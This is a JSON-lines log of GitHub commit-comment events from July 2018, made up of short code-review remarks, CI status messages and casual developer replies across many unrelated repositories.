{"id":"8010064234","type":"CommitCommentEvent","actor":{"login":"Mistergix"},"repo":{"name":"Mistergix/pygame"},"payload":{"comment":{"id":29813970,"position":55,"line":106,"path":"src/physics.py","commit_id":"01bf40f8f8e29fda796f091e27cfcf2815fd979a","created_at":"2018-07-24T13:10:47Z","updated_at":"2018-07-24T13:10:47Z","author_association":"OWNER","body":"this part is kinda horrible"}},"created_at":"2018-07-24T13:10:47Z"}
{"id":"8010065505","type":"CommitCommentEvent","actor":{"login":"semihalf-ostruszka-andrzej"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29813974,"position":145,"line":192,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T13:11:00Z","updated_at":"2018-07-24T13:11:00Z","author_association":"NONE","body":"In that scenario per core counters would be 64-bit and you seem to assume that increasing them is atomic.  That might be the case on 64-bit machines (you'd get either old or new value on separate core) but this is not universal."}},"created_at":"2018-07-24T13:11:00Z"}
{"id":"8010068258","type":"CommitCommentEvent","actor":{"login":"geans"},"repo":{"name":"geans/mlclass"},"payload":{"comment":{"id":29813978,"position":null,"line":null,"path":null,"commit_id":"cdb206c44e29dc8e40f3676dd7fbbfe96a8ccece","created_at":"2018-07-24T13:11:28Z","updated_at":"2018-07-24T13:11:28Z","author_association":"OWNER","body":"{\"status\":\"success\",\"dev_key\":\"Equipe K\",\"accuracy\":0.72448979591837,\"old_accuracy\":0.74489795918367}"}},"created_at":"2018-07-24T13:11:28Z"}
{"id":"8010072472","type":"CommitCommentEvent","actor":{"login":"pietropizzi"},"repo":{"name":"facebookarchive/react-native-custom-components"},"payload":{"comment":{"id":29813985,"position":null,"line":null,"path":null,"commit_id":"83c4fa19ccc9b6cd48ff80e457c493332819b486","created_at":"2018-07-24T13:12:11Z","updated_at":"2018-07-24T13:12:11Z","author_association":"NONE","body":"I see. Yeah we already have a fork. I guess I was hoping this would live on here. But ok. thanks!"}},"created_at":"2018-07-24T13:12:11Z"}
{"id":"8010074972","type":"CommitCommentEvent","actor":{"login":"fangfufu"},"repo":{"name":"fangfufu/httpdirfs"},"payload":{"comment":{"id":29813993,"position":4,"line":14,"path":"main.c","commit_id":"bfceba8e1bd58ee134b6deb63a1fa24cc63b62cc","created_at":"2018-07-24T13:12:36Z","updated_at":"2018-07-24T13:12:36Z","author_association":"OWNER","body":"But then the compiler screens at me if the static function are in the wrong order."}},"created_at":"2018-07-24T13:12:36Z"}
{"id":"8010092660","type":"CommitCommentEvent","actor":{"login":"tyron"},"repo":{"name":"awsdocs/iam-user-guide"},"payload":{"comment":{"id":29814061,"position":null,"line":null,"path":null,"commit_id":"64aa95d08c0ce98ca64c99e210ecddcd6bb9b0d4","created_at":"2018-07-24T13:15:29Z","updated_at":"2018-07-24T13:15:29Z","author_association":"CONTRIBUTOR","body":"@carlasp sorry to bother again, but I still think this periodic update overwrote the links. Master version currently displays the same text and links we had before the fix. \r\nAgain, if you sorted that out already, sorry again!"}},"created_at":"2018-07-24T13:15:29Z"}
{"id":"8010095059","type":"CommitCommentEvent","actor":{"login":"cweitkamp"},"repo":{"name":"cweitkamp/smarthome"},"payload":{"comment":{"id":29814063,"position":null,"line":null,"path":null,"commit_id":"23c852db8bb1761eceb515b04ef4bdf66ddb43f7","created_at":"2018-07-24T13:15:53Z","updated_at":"2018-07-24T13:15:53Z","author_association":"OWNER","body":"Testversion (requires ESH build 281 or higher and / or OH2 build 1316 or higher): [org.eclipse.smarthome.binding.openweathermap-0.10.0-SNAPSHOT.jar.zip](https://github.com/cweitkamp/smarthome/files/2223801/org.eclipse.smarthome.binding.openweathermap-0.10.0-SNAPSHOT.jar.zip)\r\n"}},"created_at":"2018-07-24T13:15:53Z"}
{"id":"8010097089","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"fangfufu/httpdirfs"},"payload":{"comment":{"id":29814068,"position":480,"line":625,"path":"network.c","commit_id":"bfceba8e1bd58ee134b6deb63a1fa24cc63b62cc","created_at":"2018-07-24T13:16:14Z","updated_at":"2018-07-24T13:16:14Z","author_association":"NONE","body":"I hope that [messages will become better for subsequent commits](https://robots.thoughtbot.com/5-useful-tips-for-a-better-commit-message \"Useful tips for a better commit message\")."}},"created_at":"2018-07-24T13:16:14Z"}
{"id":"8010097192","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29814069,"position":40,"line":658,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6369c668207e5acada1dfa3edba54112ccbd05c9","created_at":"2018-07-24T13:16:16Z","updated_at":"2018-07-24T13:16:16Z","author_association":"COLLABORATOR","body":"can this mean _özet_ as well?"}},"created_at":"2018-07-24T13:16:16Z"}
{"id":"8010100732","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29814070,"position":1,"line":1,"path":"assembl/alembic/versions/f8c765a3e0da_hidden_on_configurable_field.py","commit_id":"a5c85d019a471d7fa3a572759e80d8c0858b40a0","created_at":"2018-07-24T13:16:50Z","updated_at":"2018-07-24T13:16:50Z","author_association":"CONTRIBUTOR","body":"Really, you can create the alembic step with `-m\"hidden on configurable field\"` to have a proper docstring here, the filename will stay the same."}},"created_at":"2018-07-24T13:16:50Z"}
{"id":"8010107562","type":"CommitCommentEvent","actor":{"login":"test-me123"},"repo":{"name":"test-me123/newCollegeWear"},"payload":{"comment":{"id":29814077,"position":null,"line":null,"path":null,"commit_id":"d045a5458769f4c6181251d488c98fb34d0ee29b","created_at":"2018-07-24T13:17:57Z","updated_at":"2018-07-24T13:17:57Z","author_association":"OWNER","body":"ch"}},"created_at":"2018-07-24T13:17:57Z"}
{"id":"8010113556","type":"CommitCommentEvent","actor":{"login":"Ivorfason"},"repo":{"name":"WoLfulus/react-native"},"payload":{"comment":{"id":29814086,"position":null,"line":null,"path":null,"commit_id":"33e2d052b6e2e3e6b3595572abbc3cb9b66d5755","created_at":"2018-07-24T13:18:57Z","updated_at":"2018-07-24T13:18:57Z","author_association":"NONE","body":"File Name must be changed: Libraries/Image/AssetSourceResolver.js"}},"created_at":"2018-07-24T13:18:57Z"}
{"id":"8010114876","type":"CommitCommentEvent","actor":{"login":"caitp"},"repo":{"name":"WebKit/webkit"},"payload":{"comment":{"id":29814088,"position":18,"line":1161,"path":"Source/JavaScriptCore/bytecode/CodeBlock.cpp","commit_id":"10d59ee1fafd90c668cb1a91a64ab87df8e3ce79","created_at":"2018-07-24T13:19:11Z","updated_at":"2018-07-24T13:19:11Z","author_association":"NONE","body":"This is the implementation of some self-comments in https://github.com/WebKit/webkit/commit/0e358f9e91dcc37e9e14ca1e7baeeaf12c5b66a7 --- seems to work, but I worry that it's too memory-heavy?"}},"created_at":"2018-07-24T13:19:11Z"}
{"id":"8010115669","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29814090,"position":null,"line":null,"path":null,"commit_id":"c057b928320a7aef590e03665d03efc47e5f7bf3","created_at":"2018-07-24T13:19:19Z","updated_at":"2018-07-24T13:19:19Z","author_association":"COLLABORATOR","body":"I thought it could be useful in some settings - I'll remove it then"}},"created_at":"2018-07-24T13:19:19Z"}
{"id":"8010120361","type":"CommitCommentEvent","actor":{"login":"zhuravlevmaxim"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29814100,"position":32,"line":32,"path":"Lesson6HW/src/test/java/ru/otus/lesson6hw/AuthorTest.java","commit_id":"d16924cd2b1f21821743d524658b3df20ffcf989","created_at":"2018-07-24T13:20:04Z","updated_at":"2018-07-24T13:20:04Z","author_association":"OWNER","body":"Юрий, добрый день! Я всё равно не понял, какие классы нужно мокать и какие тестировать? Нужно мокать методы классов(AuthorDaoJDBC,GenreDaoJDBC,BookDaoJDBC), что обращаются к базе, а тестировать классы(AuthorServiceImpl,BookServiceImpl,GenreServiceImpl), которые дёргают методы классов(AuthorDaoJDBC,GenreDaoJDBC,BookDaoJDBC)?"}},"created_at":"2018-07-24T13:20:04Z"}
{"id":"8010121402","type":"CommitCommentEvent","actor":{"login":"ThomasRuf"},"repo":{"name":"ShipSoft/FairShip"},"payload":{"comment":{"id":29814102,"position":null,"line":null,"path":null,"commit_id":"bc609362da7c3c8b3ca020d7f08ff40d0dbbe7e1","created_at":"2018-07-24T13:20:14Z","updated_at":"2018-07-24T13:20:14Z","author_association":"CONTRIBUTOR","body":"there is a problem!\r\n![image](https://user-images.githubusercontent.com/7068505/43140924-fc623458-8f54-11e8-99e7-81433703516c.png)\r\n\r\nRPC hits do not match anymore the DT. "}},"created_at":"2018-07-24T13:20:14Z"}
{"id":"8010122067","type":"CommitCommentEvent","actor":{"login":"LithTheKitten"},"repo":{"name":"Kamikaze94/WolfHUD"},"payload":{"comment":{"id":29814103,"position":null,"line":null,"path":null,"commit_id":"cca17b7ee4b27f7ddc95a6ec58bf5eabf63ca07c","created_at":"2018-07-24T13:20:20Z","updated_at":"2018-07-24T13:20:20Z","author_association":"NONE","body":"something missing now wolfhud is acting up, my inventory is stuck on the trash stock and that red update thing wont go away, "}},"created_at":"2018-07-24T13:20:20Z"}
{"id":"8010125006","type":"CommitCommentEvent","actor":{"login":"sebastianbenz"},"repo":{"name":"ampproject/amp-by-example"},"payload":{"comment":{"id":29814110,"position":2,"line":2,"path":"backend/.vscode/settings.json","commit_id":"724b8acfc956402419d6db2ef44495677ed8713e","created_at":"2018-07-24T13:20:51Z","updated_at":"2018-07-24T13:20:51Z","author_association":"COLLABORATOR","body":"Did you intentionally commit this file?"}},"created_at":"2018-07-24T13:20:51Z"}
{"id":"8010125196","type":"CommitCommentEvent","actor":{"login":"sharshenov"},"repo":{"name":"rubyata/bot"},"payload":{"comment":{"id":29814111,"position":7,"line":6,"path":"lib/rubyata_bot/configuration.rb","commit_id":"7ef25025da540bc65230cc4bf2499111355c8a9b","created_at":"2018-07-24T13:20:52Z","updated_at":"2018-07-24T13:20:52Z","author_association":"COLLABORATOR","body":"а как потом конфигурить-то?"}},"created_at":"2018-07-24T13:20:52Z"}
{"id":"8010125323","type":"CommitCommentEvent","actor":{"login":"caitp"},"repo":{"name":"WebKit/webkit"},"payload":{"comment":{"id":29814112,"position":18,"line":1161,"path":"Source/JavaScriptCore/bytecode/CodeBlock.cpp","commit_id":"9f70d778a1a66b5d9eb3f2f42a0b2f0951f5ed8f","created_at":"2018-07-24T13:20:54Z","updated_at":"2018-07-24T13:20:54Z","author_association":"NONE","body":"This is the implementation of some self-comments in 0e358f9 --- seems to work, but I worry that it's too memory-heavy?"}},"created_at":"2018-07-24T13:20:54Z"}
{"id":"8010126740","type":"CommitCommentEvent","actor":{"login":"stsp"},"repo":{"name":"stsp/fdpp"},"payload":{"comment":{"id":29814114,"position":null,"line":null,"path":null,"commit_id":"c672d0c68b335a3d22567ae3dd3bd50940ea51ac","created_at":"2018-07-24T13:21:09Z","updated_at":"2018-07-24T13:21:09Z","author_association":"OWNER","body":"OK, in this case I removed comcom32.\r\n(and force-pushed, please re-sync your\r\nlocal repo)\r\nIf I already went to such a great lengths of\r\nwriting the compilers and porting layers, I\r\nshould probably just write another one for\r\nprot mode progs...\r\nNooooo! Not again... :)"}},"created_at":"2018-07-24T13:21:09Z"}
{"id":"8010126818","type":"CommitCommentEvent","actor":{"login":"jhennig3"},"repo":{"name":"jakeprobst/Anki-Android"},"payload":{"comment":{"id":29814116,"position":null,"line":null,"path":null,"commit_id":"adf03cc10d2677667a62b5cb934f55137eef719a","created_at":"2018-07-24T13:21:09Z","updated_at":"2018-07-24T13:21:09Z","author_association":"NONE","body":"How would I utilize this load balancer for ankidroid do I need to convert this into an apk or something of that nature? Sorry I am not well versed in this but my load balance is kindof out of control and I do not have a windows pc."}},"created_at":"2018-07-24T13:21:09Z"}
{"id":"8010180785","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29814239,"position":null,"line":null,"path":null,"commit_id":"cc1daf51eae4deed84557e5546fd601acac77d83","created_at":"2018-07-24T13:30:04Z","updated_at":"2018-07-24T13:30:04Z","author_association":"OWNER","body":"This flip-flopping on version numbers worries me. If the 'interface' to some of the packages changes, the version number should go up **permanently**."}},"created_at":"2018-07-24T13:30:04Z"}
{"id":"8010186739","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29814250,"position":null,"line":null,"path":null,"commit_id":"c176910ade5eeb333f106e19e24d81751a96822e","created_at":"2018-07-24T13:30:56Z","updated_at":"2018-07-24T13:30:56Z","author_association":"OWNER","body":"Note: adding a new export to `Language.Drasil` counts as a change of interface, and so its version number should go up, and stay up."}},"created_at":"2018-07-24T13:30:56Z"}
{"id":"8010189246","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29814256,"position":null,"line":null,"path":null,"commit_id":"c057b928320a7aef590e03665d03efc47e5f7bf3","created_at":"2018-07-24T13:31:20Z","updated_at":"2018-07-24T13:31:20Z","author_association":"COLLABORATOR","body":"Makes sense"}},"created_at":"2018-07-24T13:31:20Z"}
{"id":"8010190895","type":"CommitCommentEvent","actor":{"login":"2uasimojo"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29814257,"position":44,"line":44,"path":"os_resource_classes/__init__.py","commit_id":"e1094e23c3070e791f3f1a1f9837e1f7a42de862","created_at":"2018-07-24T13:31:36Z","updated_at":"2018-07-24T13:31:36Z","author_association":"NONE","body":"That seems fine, as long as steps 1 and 2 don't paint us into a corner."}},"created_at":"2018-07-24T13:31:36Z"}
{"id":"8010197997","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29814269,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-24T13:32:47Z","updated_at":"2018-07-24T13:32:47Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T13:32:47Z"}
{"id":"8010200405","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29814278,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-24T13:33:12Z","updated_at":"2018-07-24T13:33:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T13:33:12Z"}
{"id":"8010203714","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29814287,"position":null,"line":null,"path":null,"commit_id":"cc1daf51eae4deed84557e5546fd601acac77d83","created_at":"2018-07-24T13:33:43Z","updated_at":"2018-07-24T13:33:43Z","author_association":"COLLABORATOR","body":"This is that I changed them back to match master. Every time I will change them back to match master's. I believe any merge from my working didn't effect the version. The thing is every time when I made changes in drasil-lang, `make clean` doesn't work. Only increasing version number could force compile."}},"created_at":"2018-07-24T13:33:43Z"}
{"id":"8010204758","type":"CommitCommentEvent","actor":{"login":"aksonov"},"repo":{"name":"aksonov/react-native-router-flux"},"payload":{"comment":{"id":29814291,"position":21,"line":117,"path":"src/Router.js","commit_id":"bf9cd0ec09c8011ea59af25996b497d43d9c3368","created_at":"2018-07-24T13:33:54Z","updated_at":"2018-07-24T13:33:54Z","author_association":"OWNER","body":"I’m trying… Is there any way to setup prettier to match these rules? Or could we change eslint rules to follow prettier? I have VSCode with pretty simple prettier setup...\n\n> 24 июля 2018 г., в 15:28, Davis Z. Cabral <notifications@github.com> написал(а):\n> \n> You might get rid of this now ^ - right?\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/aksonov/react-native-router-flux/commit/bf9cd0ec09c8011ea59af25996b497d43d9c3368#commitcomment-29814216>, or mute the thread <https://github.com/notifications/unsubscribe-auth/ABQpcS8HiSggCjqZ5Ky6lBxfeJXqwJuNks5uJyDngaJpZM4VcvUf>.\n> \n\n"}},"created_at":"2018-07-24T13:33:54Z"}
{"id":"8010206438","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29814293,"position":null,"line":null,"path":null,"commit_id":"22ca48a8b05249765decc9a0a80db91133997057","created_at":"2018-07-24T13:34:10Z","updated_at":"2018-07-24T13:34:10Z","author_association":"COLLABORATOR","body":"You need to avoid that hard-coded path. Just make it relative, i.e. `../` kind of thing."}},"created_at":"2018-07-24T13:34:10Z"}
{"id":"8010207020","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29814297,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-24T13:34:16Z","updated_at":"2018-07-24T13:34:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T13:34:16Z"}
{"id":"8010208123","type":"CommitCommentEvent","actor":{"login":"jerevon"},"repo":{"name":"jerevon/dp_object_detection"},"payload":{"comment":{"id":29814299,"position":null,"line":null,"path":null,"commit_id":"f01623502ffe4715c5c4f84a53ece67428dfd05c","created_at":"2018-07-24T13:34:26Z","updated_at":"2018-07-24T13:34:26Z","author_association":"OWNER","body":"this resizer does not change the aspect ratio of images"}},"created_at":"2018-07-24T13:34:26Z"}
{"id":"8010210101","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29814301,"position":180,"line":382,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"0f9a24b117fa5163411fe87047c388196620050a","created_at":"2018-07-24T13:34:45Z","updated_at":"2018-07-24T13:34:45Z","author_association":"NONE","body":"I am not sure such static assert is enough. It only check that originally mbuf was allocated with such HEADROOM.\r\nBut application can use the whole headroom or part of headroom for different purposes.\r\nDriver can't assume packet structure,\r\nYou should check pointer returned by prepend and and write warning message."}},"created_at":"2018-07-24T13:34:45Z"}
{"id":"8010213015","type":"CommitCommentEvent","actor":{"login":"hbvhuwe"},"repo":{"name":"hbvhuwe/explorer-github"},"payload":{"comment":{"id":29814305,"position":null,"line":null,"path":null,"commit_id":"f80dbaa764d8c1c02af909b35ff57dcdb081d285","created_at":"2018-07-24T13:35:15Z","updated_at":"2018-07-24T13:35:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Network errors](https://trello.com/c/sLFQnasp/6-network-errors)"}},"created_at":"2018-07-24T13:35:15Z"}
{"id":"8010213460","type":"CommitCommentEvent","actor":{"login":"jrsikors"},"repo":{"name":"vergecurrency/vergecurrency.com"},"payload":{"comment":{"id":29814306,"position":null,"line":null,"path":null,"commit_id":"aadc5f24c96e350b9d63bbbec681dcc0367f737f","created_at":"2018-07-24T13:35:19Z","updated_at":"2018-07-24T13:35:19Z","author_association":"COLLABORATOR","body":"not sure why it didn't work... jpg should have been fine.  Maybe it was case sensitive?  You had uppercase .JPG as the filename but referenced lowercase .jpg?  I didn't think it would be an issue either sorry !"}},"created_at":"2018-07-24T13:35:19Z"}
{"id":"8010214966","type":"CommitCommentEvent","actor":{"login":"nachoxdxd"},"repo":{"name":"EbnerLautaro/ProyectoMain"},"payload":{"comment":{"id":29814309,"position":null,"line":null,"path":null,"commit_id":"66b1e184be6961ec97963fc0f8fc000226ea0ac9","created_at":"2018-07-24T13:35:34Z","updated_at":"2018-07-24T13:35:34Z","author_association":"NONE","body":"xd"}},"created_at":"2018-07-24T13:35:34Z"}
{"id":"8010219336","type":"CommitCommentEvent","actor":{"login":"daviscabral"},"repo":{"name":"aksonov/react-native-router-flux"},"payload":{"comment":{"id":29814316,"position":21,"line":117,"path":"src/Router.js","commit_id":"bf9cd0ec09c8011ea59af25996b497d43d9c3368","created_at":"2018-07-24T13:36:17Z","updated_at":"2018-07-24T13:36:17Z","author_association":"COLLABORATOR","body":"Yes - the rule of thumb here is disable all formatting eslint rules to avoid conflicting with prettier. \n\nMake sure your prettier settings is using the .prettierrc too.\n\n-\nDavis Cabral\n\n> On 24 Jul 2018, at 10:33, Pavel Aksonov <notifications@github.com> wrote:\n> \n> I’m trying… Is there any way to setup prettier to match these rules? Or could we change eslint rules to follow prettier? I have VSCode with pretty simple prettier setup...\n> \n> > 24 июля 2018 г., в 15:28, Davis Z. Cabral <notifications@github.com> написал(а):\n> > \n> > You might get rid of this now ^ - right?\n> > \n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub <https://github.com/aksonov/react-native-router-flux/commit/bf9cd0ec09c8011ea59af25996b497d43d9c3368#commitcomment-29814216>, or mute the thread <https://github.com/notifications/unsubscribe-auth/ABQpcS8HiSggCjqZ5Ky6lBxfeJXqwJuNks5uJyDngaJpZM4VcvUf>.\n> > \n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-24T13:36:17Z"}
{"id":"8010223600","type":"CommitCommentEvent","actor":{"login":"D3AH"},"repo":{"name":"RedCiudadana/ConoceTuEscuela"},"payload":{"comment":{"id":29814320,"position":null,"line":null,"path":null,"commit_id":"48192db03dd286926233be47e03db32c11391561","created_at":"2018-07-24T13:36:58Z","updated_at":"2018-07-24T13:36:58Z","author_association":"CONTRIBUTOR","body":"Close #1 "}},"created_at":"2018-07-24T13:36:58Z"}
{"id":"8010225638","type":"CommitCommentEvent","actor":{"login":"dotZesshan"},"repo":{"name":"pjsip/pjproject"},"payload":{"comment":{"id":29814329,"position":null,"line":null,"path":null,"commit_id":"6627f3e64b479dee8640b8a757b2b7680bb0f5ca","created_at":"2018-07-24T13:37:17Z","updated_at":"2018-07-24T13:37:17Z","author_association":"NONE","body":"@bennylp @nanangizz @ismangil @trengginas @nanangizz  @mingteluu I have to work on pjSip recntly and i was trying to set #define PJSUA_MAX_CALL 1000 but in code it was having no effect. When i tried to track it leads me to this point. This change will work for values less than 4 but what about the values greater than 4? lets say i set PJSUA_MAX_CALL 1000 and this line will always assign 4 because condition 1000 < 4 will always be false and 4 value will be assigned always, no matter how big value you try to set. \r\n\r\nSuggestion: \r\ncfg->max_calls = PJSUA_MAX_CALLS; \r\n\r\n"}},"created_at":"2018-07-24T13:37:17Z"}
{"id":"8010226939","type":"CommitCommentEvent","actor":{"login":"letelSyl"},"repo":{"name":"letelSyl/MoodSaver"},"payload":{"comment":{"id":29814336,"position":null,"line":null,"path":null,"commit_id":"ee8f502118387cacb94e20f81527d3e0807247f3","created_at":"2018-07-24T13:37:31Z","updated_at":"2018-07-24T13:37:31Z","author_association":"OWNER","body":"Adding MyPagerAdapter"}},"created_at":"2018-07-24T13:37:31Z"}
{"id":"8010229811","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29814340,"position":255,"line":441,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"0f9a24b117fa5163411fe87047c388196620050a","created_at":"2018-07-24T13:37:58Z","updated_at":"2018-07-24T13:37:58Z","author_association":"NONE","body":"I answered you by email about MTU check.\r\nIf you eliminate MTU check here, so you don't need code to reorder tx_pkts too"}},"created_at":"2018-07-24T13:37:58Z"}
{"id":"8010232512","type":"CommitCommentEvent","actor":{"login":"Bob-Thomas"},"repo":{"name":"MatteoGabriele/vue-analytics"},"payload":{"comment":{"id":29814344,"position":null,"line":null,"path":null,"commit_id":"48846121d36a1bc64cfdf5a162412151771acb16","created_at":"2018-07-24T13:38:24Z","updated_at":"2018-07-24T13:38:24Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-24T13:38:24Z"}
{"id":"8010236700","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29814351,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-24T13:39:05Z","updated_at":"2018-07-24T13:39:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T13:39:05Z"}
{"id":"8010240217","type":"CommitCommentEvent","actor":{"login":"mixa888"},"repo":{"name":"mixa888/-----"},"payload":{"comment":{"id":29814354,"position":null,"line":null,"path":null,"commit_id":"8dada50abb57500c40315105de35ae338261fd63","created_at":"2018-07-24T13:39:38Z","updated_at":"2018-07-24T13:39:38Z","author_association":"OWNER","body":"https://github.com/mixa888"}},"created_at":"2018-07-24T13:39:38Z"}
{"id":"8010242940","type":"CommitCommentEvent","actor":{"login":"mixa888"},"repo":{"name":"mixa888/-----"},"payload":{"comment":{"id":29814361,"position":null,"line":null,"path":null,"commit_id":"8dada50abb57500c40315105de35ae338261fd63","created_at":"2018-07-24T13:40:05Z","updated_at":"2018-07-24T13:40:05Z","author_association":"OWNER","body":"00000"}},"created_at":"2018-07-24T13:40:05Z"}
{"id":"8010244006","type":"CommitCommentEvent","actor":{"login":"DragonBuilder"},"repo":{"name":"DragonBuilder/javascript-apps-beginner"},"payload":{"comment":{"id":29814363,"position":null,"line":null,"path":null,"commit_id":"2b043871f8cf1bf6ce9c0093e0345c596f9c20ce","created_at":"2018-07-24T13:40:16Z","updated_at":"2018-07-24T13:40:16Z","author_association":"OWNER","body":"commit with style."}},"created_at":"2018-07-24T13:40:16Z"}
{"id":"8010246695","type":"CommitCommentEvent","actor":{"login":"nodepp"},"repo":{"name":"nodepp/smartnode"},"payload":{"comment":{"id":29814369,"position":7,"line":9,"path":"app/build.gradle","commit_id":"adfdb38fab76b7b6ba67dda98f09eb2831446e58","created_at":"2018-07-24T13:40:42Z","updated_at":"2018-07-24T13:40:42Z","author_association":"OWNER","body":"这个密码要想办法放到其它地方。。。"}},"created_at":"2018-07-24T13:40:42Z"}
{"id":"8010248469","type":"CommitCommentEvent","actor":{"login":"mpbraendle"},"repo":{"name":"eprints/eprints"},"payload":{"comment":{"id":29814376,"position":null,"line":null,"path":null,"commit_id":"e3e08522ff365c9953fa8dd60496cc4a3fb5abf7","created_at":"2018-07-24T13:40:59Z","updated_at":"2018-07-24T13:40:59Z","author_association":"CONTRIBUTOR","body":"eprints that have been moved back to buffer and inbox from archive already have a datestamp. However, they should not be visible in the OAI-PMH result set. Therefore I'm not sure whether this change is appropriate."}},"created_at":"2018-07-24T13:40:59Z"}
